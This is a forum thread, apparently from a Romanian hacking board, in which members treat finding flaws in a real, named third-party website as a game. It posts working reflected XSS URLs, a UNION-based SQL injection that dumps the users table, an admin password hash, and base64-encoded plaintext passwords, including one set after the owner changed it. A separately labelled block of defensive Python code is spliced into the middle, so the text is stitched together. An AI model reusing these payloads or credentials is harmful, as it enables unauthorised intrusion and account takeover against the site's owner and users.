Sega Posted February 18, 2012 (edited)
Target: www.nicepps.ro
Find an XSS on this site and post a screenshot (hide the details).
Example: http://postimage.org/image/pn4ob6rzb/
P.S.: It's not hard, just for fun.
Found the XSS so far: Jimmy, KodRSS, ak4d3a, blackboy[1337]
Edited February 18, 2012 by Sega
Jimmy Posted February 18, 2012
malsploit Posted February 18, 2012
It has something else besides the XSS.
Sega Posted February 18, 2012 (edited)
Quote (malsploit): It has something else besides the XSS.
Now I see it also has SQLi. @ak4d3a see if you can find an XSS in an .HTML page.
Edited February 18, 2012 by Sega
blackboy-1337- Posted February 18, 2012
http://imageshack.us/photo/my-images/259/lenep.jpg/
SirGod Posted February 18, 2012
Quote (Sega): Now I see it also has SQLi. @ak4d3a see if you can find an XSS in an .HTML page.
Those "HTML" pages are actually PHP scripts (URL rewrite). In static HTML pages you can only find DOM XSS, and only if they contain vulnerable JavaScript code.
Sega Posted February 18, 2012 (edited)
XSS
http://www.nicepps.ro/cauta-pps-ppt-toate-categoriile-0-q-"><script>alert(1)</script>-m-orice-cuvant-pag-1.html
http://www.nicepps.ro/index.php?action=felicitare&id=369'"><script>alert(1)</script>
SQLI
www.nicepps.ro/index.php?action=details&id=2561 and 1=2 UNION SELECT 1,group_concat(user,0x2c20,password,0x2c20,email,0x3c62722f3e),3,4,5,6,7,8,9,10,11,12,13 FROM users--
Admin : Pass
AlexB : 90ae07eadcbfc3934252980ed73885d5 (i.e. YWxleDc3Nw==)
Login page: admin
@SirGod isn't that obvious? The interesting part of that XSS: if you enter it in the search box it doesn't get past the filter, but if you put it directly in the URL (above) it gets past that filter.
You can close the thread (T.C).
Edited February 18, 2012 by Sega
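The filter bypass described above happens because the check runs in the search form, not in the script behind the rewritten URL. As an added example (not code from the thread or from nicepps.ro), the following shows server-side handling that closes both findings; the rewrite pattern, parameter names and rendering functions are assumptions about how such a page could be built:

```python
import html
import re
from urllib.parse import unquote

# Assumed shape of the rewritten search URL seen in the thread (not the site's real
# rewrite rule): /cauta-pps-ppt-toate-categoriile-<cat>-q-<term>-m-<mode>-pag-<n>.html
SEARCH_PATH = re.compile(
    r"^/cauta-pps-ppt-toate-categoriile-(?P<cat>\d+)-q-(?P<q>.*?)"
    r"-m-(?P<mode>.+?)-pag-(?P<pag>\d+)\.html$"
)


def parse_search_path(path):
    """Map the 'pretty' .html URL back to the parameters the PHP script sees.

    A JavaScript filter on the search form never runs for a hand-typed URL,
    so everything extracted here is attacker-controlled input.
    """
    m = SEARCH_PATH.match(path)
    if m is None:
        return None
    return {k: unquote(v) for k, v in m.groupdict().items()}


def render_search_box_vulnerable(params):
    # Reflects the raw term into an attribute: this is the reflected XSS.
    return '<input name="q" value="%s">' % params["q"]


def render_search_box_hardened(params):
    # Contextual output encoding on the server: quotes and angle brackets
    # become entities, so the value cannot break out of the attribute.
    return '<input name="q" value="%s">' % html.escape(params["q"], quote=True)


def parse_id(raw):
    """Accept only a positive decimal id for index.php?action=...&id=...

    Rejecting anything else stops both the quote/script payload on the
    felicitare page and the UNION SELECT payload on the details page;
    the database query itself should still use a parameterised statement.
    """
    return int(raw) if raw.isdecimal() and int(raw) > 0 else None
```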
curiosul Posted February 18, 2012
Easy...
SilviuSDS Posted February 18, 2012
Sega Posted February 18, 2012
@curiosul where do you see an XSS in your screenshot? @silviu I already posted the solution.
Guest expl0iter Posted February 18, 2012
If this is a challenge, then what are pyth0ne's?
curiosul Posted February 18, 2012
@sega I found the XSS, but I didn't think a screenshot was needed anymore; I found what I posted more interesting...
aHR0cDovL3d3dy5uaWNlcHBzLnJvL2NhdXRhLXBwcy1wcHQtdG9hdGUtY2F0ZWdvcmlpbGUtMC1xLSUzQ2lmcmFtZS8lMjAvb25sb2FkPWFsZXJ0JTI4L3hzcy8lMjklM0UlM0NpZnJhbWUlM0UtbS1vcmljZS1jdXZhbnQtcGFnLTEuaHRtbA==
jetus Posted February 18, 2012
PowerPoint presentations (pps, pptx, ppt, ppsx) -
Sega Posted February 19, 2012 (edited)
Quote (Sega): [the XSS and SQLi solution from the earlier post above]
I posted the solution, what are you still posting for?
L.E.: the admin changed the password but did not fix the vulnerability. New password: YW5hY29uZGEyNw==
Edited February 19, 2012 by Sega
SilviuSDS Posted February 19, 2012
Quote (Sega): @curiosul where do you see an XSS in your screenshot? @silviu I already posted the solution.
I wasn't paying attention, I only read the first post.